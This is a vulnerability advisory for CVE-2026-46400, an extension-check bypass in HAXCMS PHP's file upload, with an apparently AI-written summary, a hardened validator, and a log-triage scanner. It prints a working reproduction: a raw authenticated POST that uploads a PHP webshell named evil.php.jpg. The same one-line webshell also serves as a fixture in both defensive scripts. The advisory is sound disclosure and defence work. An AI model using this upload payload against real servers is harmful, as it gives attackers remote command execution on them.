CVE-2026-46400
Description
HAX CMS PHP allows uploading malicious files by bypassing extension validation, potentially leading to remote code execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Starting in version 11.0.6 and prior to version 25.0.0, HAXCMS PHP's file upload functionality incorrectly validates file extensions using only a regex pattern in system/backend/php/lib/HAXCMSFile.php (Lines 24-27) without verifying the actual file content or MIME type. This vulnerability exists in the PHP backend of HAXCMS.
Exploitation
An attacker crafts a malicious file (e.g., a PHP webshell), gives it a legitimate-looking extension such as .jpg, and submits it in a multipart POST to the /system/api/saveFile endpoint. The advisory also notes that bulk-import mode may bypass the is_uploaded_file() check, so the same code path can be reached with a file that did not arrive as an HTTP upload [1].
Impact
Successful exploitation allows an attacker to upload arbitrary files, including webshells, which can then be executed on the server. This can lead to remote code execution with the privileges of the web server process.
Mitigation
Version 25.0.0 contains a fix for this issue. Users should update to version 25.0.0 or later. No workarounds are mentioned in the available references [1].
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- HAXCMS PHP, affected range: >=11.0.6 <25.0.0
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The file upload functionality in HAXCMS PHP only validates file extensions using a regex pattern without checking the actual file content or MIME type."
Attack vector
An attacker can upload a malicious file, such as a PHP webshell, by giving it a legitimate image extension (e.g., `.jpg`). The vulnerable code in `system/backend/php/lib/HAXCMSFile.php` matches the filename against a regex of allowed extensions but does not inspect the file's content or MIME type before saving it. A name like `evil.php.jpg` satisfies such a regex, and the upload becomes remote code execution wherever the web server's handler mapping executes a file whose name contains `.php` in any position, for example an Apache `AddHandler` directive for `.php`, which treats every dotted segment as an extension [ref_id=1].
Affected code
The vulnerability resides in the file upload functionality within HAXCMS PHP. Specifically, lines 24-27 of the file `system/backend/php/lib/HAXCMSFile.php` contain the vulnerable code that performs file extension validation using a regex pattern. The advisory notes that the MIME type check at lines 73-77 occurs too late, after the file has already been saved to disk [ref_id=1].
What the fix does
The advisory recommends validating the MIME type before saving the file, using functions like `finfo_open(FILEINFO_MIME_TYPE)` to check the actual file type, and verifying file content with methods such as `getimagesize()` for images. Additionally, it suggests storing uploaded files outside the web root or using `Content-Disposition: attachment` to mitigate risks [ref_id=1]. Version 25.0.0 is stated to contain a fix for this issue.
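The checks the advisory recommends, assembled into one validator, as an added example (not HAXCMS project code). The function names, the ALLOWED_IMAGE_TYPES table, and the in-memory PNG and webshell inputs are constructed for the demonstration; the weak extension regex is illustrative of the pattern described, not the project's actual expression. It goes one step beyond the advisory: the stored filename is regenerated from the detected type, so the client-supplied name never reaches disk.

```php
<?php
// Added example, not HAXCMS project code. Shows why an extension-only regex
// accepts "evil.php.jpg", and a replacement check that validates content
// before anything is written. Function and constant names are hypothetical.
declare(strict_types=1);

// Detected MIME type => extensions allowed for it. Content decides the type;
// the client's filename only has to be consistent with it.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => ['jpg', 'jpeg'],
    'image/png'  => ['png'],
    'image/gif'  => ['gif'],
];

// The weak check: a final-extension regex is satisfied by "evil.php.jpg"
// and never looks at the bytes.
function extensionLooksLikeImage(string $filename): bool
{
    return preg_match('/\.(jpe?g|png|gif)$/i', $filename) === 1;
}

// Hardened check. $path is the temp file to inspect (for HTTP uploads the
// caller has already confirmed is_uploaded_file() on it); $clientName is the
// name the client supplied. Returns the canonical extension to store under,
// or throws. Nothing touches the web root until this returns.
function validateImageUpload(string $path, string $clientName): string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $allowedExts = array_merge(...array_values(ALLOWED_IMAGE_TYPES));
    if (!in_array($ext, $allowedExts, true)) {
        throw new RuntimeException("extension .$ext not allowed");
    }

    // Type from libmagic on the content, not from the Content-Type header.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $path);
    finfo_close($finfo);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('detected type ' . var_export($mime, true) . ' is not an allowed image');
    }

    // Extension and detected type must agree (a ".jpg" that is really a PNG is refused too).
    if (!in_array($ext, ALLOWED_IMAGE_TYPES[$mime], true)) {
        throw new RuntimeException("extension .$ext does not match detected type $mime");
    }

    // The image must decode far enough to yield dimensions.
    if (@getimagesize($path) === false) {
        throw new RuntimeException('not a decodable image');
    }
    return ALLOWED_IMAGE_TYPES[$mime][0];
}

// Random basename plus the canonical extension: no part of the client-supplied
// name, and no inner ".php", ever reaches the filesystem.
function storedName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Builds a minimal valid 1x1 greyscale PNG in memory (constructed test input).
function tinyPng(): string
{
    $chunk = function (string $type, string $data): string {
        return pack('N', strlen($data)) . $type . $data . pack('N', crc32($type . $data));
    };
    $ihdr = pack('NNCCCCC', 1, 1, 8, 0, 0, 0, 0);   // width 1, height 1, 8-bit greyscale
    $idat = gzcompress("\x00\x00");                 // filter byte + one pixel
    return "\x89PNG\r\n\x1a\n" . $chunk('IHDR', $ihdr) . $chunk('IDAT', $idat) . $chunk('IEND', '');
}

// Demonstration with constructed inputs.
$shell = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($shell, '<?php system($_GET["cmd"]); ?>');   // the payload from the reproduction
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, tinyPng());

var_dump(extensionLooksLikeImage('evil.php.jpg'));   // the regex alone is satisfied
foreach ([[$shell, 'evil.php.jpg'], [$png, 'logo.png'], [$png, 'logo.jpg']] as [$file, $name]) {
    try {
        echo "$name -> stored as ", storedName(validateImageUpload($file, $name)), PHP_EOL;
    } catch (RuntimeException $e) {
        echo "$name -> rejected: ", $e->getMessage(), PHP_EOL;
    }
}
unlink($shell);
unlink($png);
```

Run with `php validate.php`. The webshell named evil.php.jpg passes the regex but is refused at the libmagic step because its content is a PHP script, not an image; the PNG named logo.png is accepted and gets a random basename; the same PNG named logo.jpg is refused because the extension disagrees with the detected type. The order matters: every check runs against the temp file, and the move into the site's files directory happens only after the function returns.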
Preconditions
- The attacker must be able to reach the upload endpoint. The reproduction request below carries a HAXCMS jwt and site_token, so in practice this means an authenticated user with edit access to a site.
- The uploaded file must carry an allowed extension (e.g., .jpg) while its content is something else (e.g., a PHP webshell).
Reproduction
POST /system/api/saveFile?site_token=39j7UnbEZzHBuywxvlQt5hQi6f9gp86ZDKBm9OCJ450?siteName=club-website&nodeId=item-club-home&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlhSY3lIQndaWlJiRFVyeVhLcVhHaFpSYkJzOG5LSWM2SGxTQTJNelBYbFkiLCJpYXQiOjE3NjgyODIyMDYsImV4cCI6MTc2ODI4MzEwNiwidXNlciI6ImZvZWNhdCJ9.kHUlyquhx1SiaMAFDj3Av1kKtmXBY6bG-iw_TDgyEbI HTTP/1.1
Host: 192.168.176.130:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundary62afc0223c1b108ae6a19913de6fe977
Content-Length: 254
Origin: http://192.168.176.130:8080
Connection: keep-alive
Referer: http://192.168.176.130:8080/sites/club-website/
Cookie: from-crmeb-admin%3Auuid=1; from-crmeb-admin%3Atoken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTQxMGRlMTU2Yzg4ODU2Yjk1MTA5Y2YwYmJiODA5MCIsImlzcyI6IjE5Mi4xNjguMTc2LjEzMDo4MDExIiwiYXVkIjoiMTkyLjE2OC4xNzYuMTMwO: 8011iLCJpYXQiOjE3Njc2NDMyMjksIm5iZiI6MTc2NzY0MzIyOSwiZXhwIjoxNzcwMjM1MjI5LCJqdGkiOnsiaWQiOjEsInR5cGUiOiJhZG1pbiJ9fQ.ksBnrXPPDQ4jozhgV4DiBn-9kXRTVossplQh6kdsWog; from-crmeb-admin%3Aexpires_time=1770235229; haxcms_refresh_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZm9lY2F0IiwiaWF0IjoxNzY4MjgyMjA2LCJleHAiOjE3NjgzNjg2MDZ9.GavlZgSX_ROrDR0IncAGbNUCqcMw8Z5M3yBTYIP5Hd4
Priority: u=0

------geckoformboundary62afc0223c1b108ae6a19913de6fe977
Content-Disposition: form-data; name="file-upload"; filename="evil.php.jpg"
Content-Type: image/jpeg

<?php system($_GET["cmd"]); ?>
------geckoformboundary62afc0223c1b108ae6a19913de6fe977--

The file is saved to /var/www/html/_sites/club-website/files/evil.php.jpg and may be executed depending on server configuration [ref_id=1]. On Apache the deciding detail is the PHP handler mapping: an AddHandler directive for .php runs evil.php.jpg because the inner segment matches, while a `<FilesMatch "\.php$">` SetHandler mapping only executes names ending in .php. Note that the request is authenticated (jwt and site_token in the query string, haxcms_refresh_token cookie), and that the multipart Content-Type of image/jpeg is client-controlled and proves nothing about the bytes.
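For responders who find a request like this in their access logs, an added triage script (not HAXCMS code) that hunts a site's files directories for uploads of this kind. It flags names with more than one extension, files whose libmagic type disagrees with an image extension, and files whose leading bytes contain a PHP open tag. The root path, the fixture files and the 8 KiB read window are assumptions made for the demonstration.

```php
<?php
// Added example, not HAXCMS project code: post-incident triage for uploads of
// this kind. Paths, names and the sample files below are constructed.
declare(strict_types=1);

function scanUploads(string $root): array
{
    $findings = [];
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $path = $entry->getPathname();
        $name = $entry->getFilename();
        $reasons = [];

        // "evil.php.jpg": a second dot is worth a look on its own, since an
        // Apache AddHandler mapping treats every dotted segment as an extension.
        if (substr_count($name, '.') > 1) {
            $reasons[] = 'multiple extensions';
        }

        // Extension says image, content says otherwise.
        $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        $mime = finfo_file($finfo, $path) ?: 'unknown';
        if (in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true) && strpos($mime, 'image/') !== 0) {
            $reasons[] = "extension .$ext but detected type $mime";
        }

        // PHP open tag anywhere in the first 8 KiB, which also catches a
        // polyglot that starts with a genuine image header.
        $head = (string) file_get_contents($path, false, null, 0, 8192);
        if (preg_match('/<\?(php\b|=)/i', $head) === 1) {
            $reasons[] = 'contains PHP open tag';
        }

        if ($reasons) {
            $findings[$path] = $reasons;
        }
    }
    finfo_close($finfo);
    return $findings;
}

// Constructed fixture mirroring the layout from the reproduction: _sites/<site>/files/.
$root  = sys_get_temp_dir() . '/haxscan_' . bin2hex(random_bytes(4));
$files = "$root/_sites/club-website/files";
mkdir($files, 0700, true);
file_put_contents("$files/evil.php.jpg", '<?php system($_GET["cmd"]); ?>');          // the PoC payload
file_put_contents("$files/notes.txt", 'meeting agenda');                              // benign, not flagged
file_put_contents("$files/photo.jpg", "\xFF\xD8\xFF\xE0" . str_repeat("\x00", 16) . '<?php echo 1; ?>'); // JPEG header + code

foreach (scanUploads($root) as $path => $reasons) {
    echo $path, ': ', implode('; ', $reasons), PHP_EOL;
}

// Remove the fixture.
array_map('unlink', glob("$files/*"));
rmdir($files);
rmdir("$root/_sites/club-website");
rmdir("$root/_sites");
rmdir($root);
```

Point `scanUploads()` at the real `_sites` directory (with `--` read-only mounts or a copy of the evidence, since any hit is forensic material), and pair the output with the web server's handler configuration: a flagged file under a `<FilesMatch "\.php$">` SetHandler mapping is a stored webshell that never ran, while under an AddHandler mapping for .php it is a file that every GET to its path has executed.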
References
News mentions
- HAX CMS: 15 Vulnerabilities Disclosed Together on June 5, 2026. Vypr Intelligence, Jun 5, 2026